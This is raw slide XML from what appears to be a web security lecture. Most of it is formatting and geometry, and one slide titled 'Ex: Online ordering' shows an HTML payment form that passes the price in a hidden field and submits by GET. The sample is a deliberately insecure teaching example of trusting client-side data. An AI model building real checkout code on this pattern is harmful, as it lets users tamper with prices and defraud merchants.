              <a:lnSpc>
                <a:spcPts val="2725"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-4" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158742" name="object 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C6FAA24-64EA-384E-BEAC-05390063522F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7312025" y="6151563"/>
            <a:ext cx="379413" cy="3635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43" name="object 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B8C0651-5AC5-F14C-BFEE-7324680CF177}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7340600" y="6161088"/>
            <a:ext cx="320675" cy="3032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8744" name="object 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{029BD3EB-A300-7641-A183-6017C7C751A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7340600" y="6161088"/>
            <a:ext cx="322263" cy="303212"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 415290"/>
              <a:gd name="T1" fmla="*/ 0 h 379729"/>
              <a:gd name="T2" fmla="*/ 2020 w 415290"/>
              <a:gd name="T3" fmla="*/ 0 h 379729"/>
              <a:gd name="T4" fmla="*/ 2020 w 415290"/>
              <a:gd name="T5" fmla="*/ 3364 h 379729"/>
              <a:gd name="T6" fmla="*/ 0 w 415290"/>
              <a:gd name="T7" fmla="*/ 3364 h 379729"/>
              <a:gd name="T8" fmla="*/ 0 w 415290"/>
              <a:gd name="T9" fmla="*/ 0 h 379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290" h="379729">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="415086" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="415086" y="379399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="379399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF2A0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2" name="object 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{672DC3E8-DEC8-D741-84B4-335AC61D6659}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1200000">
            <a:off x="3775075" y="4381500"/>
            <a:ext cx="2847975" cy="269875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2127"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2300" spc="-4" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2300" spc="-63" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3400" spc="24" baseline="-1915" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>content</a:t>
            </a:r>
            <a:endParaRPr sz="3400" baseline="-1915" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158746" name="object 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90B4E948-EFA8-7E4F-87DC-BC6AEB1F7BCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="3657600"/>
            <a:ext cx="365125" cy="376238"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2125 w 471170"/>
              <a:gd name="T1" fmla="*/ 1221 h 471170"/>
              <a:gd name="T2" fmla="*/ 2197 w 471170"/>
              <a:gd name="T3" fmla="*/ 1622 h 471170"/>
              <a:gd name="T4" fmla="*/ 2225 w 471170"/>
              <a:gd name="T5" fmla="*/ 2029 h 471170"/>
              <a:gd name="T6" fmla="*/ 2210 w 471170"/>
              <a:gd name="T7" fmla="*/ 2432 h 471170"/>
              <a:gd name="T8" fmla="*/ 2155 w 471170"/>
              <a:gd name="T9" fmla="*/ 2819 h 471170"/>
              <a:gd name="T10" fmla="*/ 2061 w 471170"/>
              <a:gd name="T11" fmla="*/ 3179 h 471170"/>
              <a:gd name="T12" fmla="*/ 1932 w 471170"/>
              <a:gd name="T13" fmla="*/ 3502 h 471170"/>
              <a:gd name="T14" fmla="*/ 1769 w 471170"/>
              <a:gd name="T15" fmla="*/ 3774 h 471170"/>
              <a:gd name="T16" fmla="*/ 1575 w 471170"/>
              <a:gd name="T17" fmla="*/ 3989 h 471170"/>
              <a:gd name="T18" fmla="*/ 1361 w 471170"/>
              <a:gd name="T19" fmla="*/ 4124 h 471170"/>
              <a:gd name="T20" fmla="*/ 1144 w 471170"/>
              <a:gd name="T21" fmla="*/ 4175 h 471170"/>
              <a:gd name="T22" fmla="*/ 930 w 471170"/>
              <a:gd name="T23" fmla="*/ 4148 h 471170"/>
              <a:gd name="T24" fmla="*/ 724 w 471170"/>
              <a:gd name="T25" fmla="*/ 4044 h 471170"/>
              <a:gd name="T26" fmla="*/ 531 w 471170"/>
              <a:gd name="T27" fmla="*/ 3869 h 471170"/>
              <a:gd name="T28" fmla="*/ 360 w 471170"/>
              <a:gd name="T29" fmla="*/ 3626 h 471170"/>
              <a:gd name="T30" fmla="*/ 214 w 471170"/>
              <a:gd name="T31" fmla="*/ 3320 h 471170"/>
              <a:gd name="T32" fmla="*/ 100 w 471170"/>
              <a:gd name="T33" fmla="*/ 2955 h 471170"/>
              <a:gd name="T34" fmla="*/ 28 w 471170"/>
              <a:gd name="T35" fmla="*/ 2554 h 471170"/>
              <a:gd name="T36" fmla="*/ 0 w 471170"/>
              <a:gd name="T37" fmla="*/ 2147 h 471170"/>
              <a:gd name="T38" fmla="*/ 15 w 471170"/>
              <a:gd name="T39" fmla="*/ 1745 h 471170"/>
              <a:gd name="T40" fmla="*/ 71 w 471170"/>
              <a:gd name="T41" fmla="*/ 1357 h 471170"/>
              <a:gd name="T42" fmla="*/ 164 w 471170"/>
              <a:gd name="T43" fmla="*/ 997 h 471170"/>
              <a:gd name="T44" fmla="*/ 293 w 471170"/>
              <a:gd name="T45" fmla="*/ 675 h 471170"/>
              <a:gd name="T46" fmla="*/ 456 w 471170"/>
              <a:gd name="T47" fmla="*/ 401 h 471170"/>
              <a:gd name="T48" fmla="*/ 651 w 471170"/>
              <a:gd name="T49" fmla="*/ 188 h 471170"/>
              <a:gd name="T50" fmla="*/ 864 w 471170"/>
              <a:gd name="T51" fmla="*/ 52 h 471170"/>
              <a:gd name="T52" fmla="*/ 1080 w 471170"/>
              <a:gd name="T53" fmla="*/ 0 h 471170"/>
              <a:gd name="T54" fmla="*/ 1296 w 471170"/>
              <a:gd name="T55" fmla="*/ 28 h 471170"/>
              <a:gd name="T56" fmla="*/ 1502 w 471170"/>
              <a:gd name="T57" fmla="*/ 132 h 471170"/>
              <a:gd name="T58" fmla="*/ 1694 w 471170"/>
              <a:gd name="T59" fmla="*/ 307 h 471170"/>
              <a:gd name="T60" fmla="*/ 1866 w 471170"/>
              <a:gd name="T61" fmla="*/ 549 h 471170"/>
              <a:gd name="T62" fmla="*/ 2011 w 471170"/>
              <a:gd name="T63" fmla="*/ 856 h 471170"/>
              <a:gd name="T64" fmla="*/ 2125 w 471170"/>
              <a:gd name="T65" fmla="*/ 1221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49552" y="137685"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="464888" y="182834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="470745" y="228730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="467591" y="274118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="455895" y="317745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="436126" y="358355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="408751" y="394696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="374239" y="425513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="333059" y="449552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287910" y="464888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242014" y="470745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="196626" y="467591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152999" y="455895"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112389" y="436126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76048" y="408751"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45231" y="374239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21192" y="333059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5856" y="287910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="242014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3153" y="196626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14849" y="152999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34619" y="112389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61993" y="76048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96505" y="45231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="137685" y="21193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182834" y="5856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228730" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274118" y="3153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="317745" y="14849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358355" y="34619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394696" y="61993"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="425513" y="96505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="449552" y="137685"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="25399">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object 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7A29E86-E726-AD4F-AB96-FC9D8468A26C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1200000">
            <a:off x="3430588" y="3730625"/>
            <a:ext cx="406400" cy="346075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2730"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-4" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="35" name="Straight Arrow Connector 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E85D034-5799-7045-94D7-21C1347DB94D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2754313" y="3719513"/>
            <a:ext cx="3776662" cy="1550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86E5A1E-F524-364A-87C4-E656A5426B23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2830513" y="4429125"/>
            <a:ext cx="3752850" cy="15509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 name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3D7491C-BE16-5E40-820F-0CE13577468F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6659563" y="5021263"/>
            <a:ext cx="1682750" cy="942975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="2985" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="24"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr sz="3600" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="89044">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr sz="2500" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158751" name="object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9590CF82-562F-5B41-9604-B25F20C42B74}"/>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object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A59F9835-4C5D-4744-A9EB-FF92686464EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1820863" y="2960688"/>
            <a:ext cx="6303962" cy="3133725"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 6303645"/>
              <a:gd name="T1" fmla="*/ 0 h 3133725"/>
              <a:gd name="T2" fmla="*/ 6310515 w 6303645"/>
              <a:gd name="T3" fmla="*/ 0 h 3133725"/>
              <a:gd name="T4" fmla="*/ 6310515 w 6303645"/>
              <a:gd name="T5" fmla="*/ 3133425 h 3133725"/>
              <a:gd name="T6" fmla="*/ 0 w 6303645"/>
              <a:gd name="T7" fmla="*/ 3133425 h 3133725"/>
              <a:gd name="T8" fmla="*/ 0 w 6303645"/>
              <a:gd name="T9" fmla="*/ 0 h 31337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03645" h="3133725">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6303224" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6303224" y="3133425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3133425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="982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699" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC14FD45-59C2-5448-99D1-66521A202F47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1841500" y="2984500"/>
            <a:ext cx="5978525"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&lt;html&gt;</a:t>
            </a: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&lt;head&gt; &lt;title&gt;Pay&lt;/title&gt; &lt;/head&gt;</a:t>
            </a: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&lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1700">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRP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&lt;form action=“submit_order” method=“GET”&gt;  The total cost is $5.50. Confirm order?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94D3A8AB-5A5D-4944-9192-D27A3D695595}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4564063" y="4508500"/>
            <a:ext cx="1582737" cy="269875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1700" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>name=“price”</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5ECA9CBB-E82F-3042-A3B7-AFDA1696BAD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1841500" y="4508500"/>
            <a:ext cx="803275" cy="811213"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1700" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;input</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2020"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="60"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1700" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;input</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2020"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1700" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;input</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29702" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B119E2C2-CD56-3F4E-AEA9-4CD23489EE52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2749550" y="4506913"/>
            <a:ext cx="1711325"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eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>type=“hidden”  type=“submit”  type=“submit”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29703" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34B0C193-4F7C-8145-B6C6-938CCE9493A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4564063" y="4787900"/>
            <a:ext cx="30099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name=“pay” value=“yes”&gt;  name=“pay” value=“no”&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29704" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E56CE85B-9361-3647-9845-11CEBBED61AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1841500" y="5537200"/>
            <a:ext cx="9334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&lt;/body&gt;</a:t>
            </a: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&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F55684D2-B3AC-C94B-9CE4-C9DB03170430}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515350" cy="957263"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="877928" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="6100" spc="-100" dirty="0"/>
              <a:t>Ex: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="15" dirty="0"/>
              <a:t>Online</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="60" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="85" dirty="0"/>
              <a:t>ordering</a:t>
            </a:r>
            <a:endParaRPr sz="6100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3512BA7C-6361-564C-9776-525BE35DC18B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2755900" y="2273300"/>
            <a:ext cx="4535488" cy="404813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
